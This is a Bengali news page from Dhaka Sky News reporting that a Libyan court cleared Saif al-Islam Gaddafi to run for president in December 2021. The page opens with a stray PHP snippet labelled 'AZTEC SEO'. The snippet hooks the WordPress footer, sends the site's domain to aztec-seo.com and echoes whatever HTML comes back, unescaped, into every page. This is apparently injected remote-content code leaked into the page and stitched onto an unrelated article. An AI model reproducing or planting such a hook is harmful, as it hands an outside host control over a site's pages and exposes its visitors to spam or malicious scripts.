/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); গাদ্দাফিপুত্র সাইফ প্রেসিডেন্ট পদে লড়বেন | Dhaka Sky News

পদ্মায় ধরা পড়ছে প্রচুর ইলিশ, ক্রেতাদের ভিড় বাজারে

আগের সংবাদ

ইউএনওর উপস্থিতি টের পেয়ে কনে সাজলেন ভাবী

পরের সংবাদ

শান্তি ফেরাতে লিবিয়ায় নির্বাচন

গাদ্দাফিপুত্র সাইফ প্রেসিডেন্ট পদে লড়বেন

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: December 3, 2021 , 2:05 pm

লিবিয়ার প্রয়াত বিপ্লবী নেতা মুয়াম্মার আল গাদ্দাফির ছেলে সাইফ আল ইসলাম গাদ্দাফির দেশটির প্রেসিডেন্ট পদে প্রতিদ্বন্দ্বিতার যে প্রতিবন্ধকতা তৈরি হয়েছিল তা দূর হয়েছে। লিবিয়ার আদালত সাইফের আপিল গ্রহণ করায় তার নির্বাচনে লড়তে আর কোনও বাধা রইল না।

আনাদুলো ও ডেইলি সাবাহর খবরে আরো জানা যায়, ২৪ ডিসেম্বর লিবিয়ার প্রেসিডেন্ট পদে ভোটগ্রহণ হবে। নির্বাচনে সাইফের অংশগ্রহণে নিষেধাজ্ঞা দিয়ে দেশটির আদালত কয়েক দিন আগে রুল জারি করেছিল। বৃহস্পতিবার সাবা আদালত সাইফের আবেদন গ্রহণ করে তাকে নির্বাচনে অংশ নেওয়ার আদেশ দিয়েছেন।

গত ১৪ নভেম্বর সাইফ আল ইসলাম আল গাদ্দাফি মনোনয়নপত্র জমা দিয়েছিলেন। মঙ্গলবার সাইফের পাশাপাশি আরও ২৫ প্রার্থীর মনোনয়ন বাতিল করেছে নির্বাচন কমিশন। কমিশন ৭৩ প্রার্থীর মনোনয়ন বৈধ ঘোষণা করে। জাতিসংঘের মধ্যস্থতায় লিবিয়া কর্তৃপক্ষ ও বিরোধী পক্ষগুলো নির্বাচনে যেতে রাজি হয়েছে। এই নির্বাচনে সাইফ গাদ্দাফিকে শক্ত প্রতিদ্বন্দ্বী মনে করা হচ্ছে। গাদ্দাফির শাসনামালের শেষ দিকে আরব বসন্তের সময় যুদ্ধাপরাধের দায়ে সাইফকে ২০১৫ সালে মৃত্যুদণ্ডের আদেশ দিয়েছিলেন ত্রিপলির আদালত।

বিপ্লবী নেতা গাদ্দাফি যুগের অবসানের পর লিবিয়াজুড়ে যে সংঘাত চলছে, এই নির্বাচনকে সেই সংঘাত থামানোর উপায় মনে করা হচ্ছে।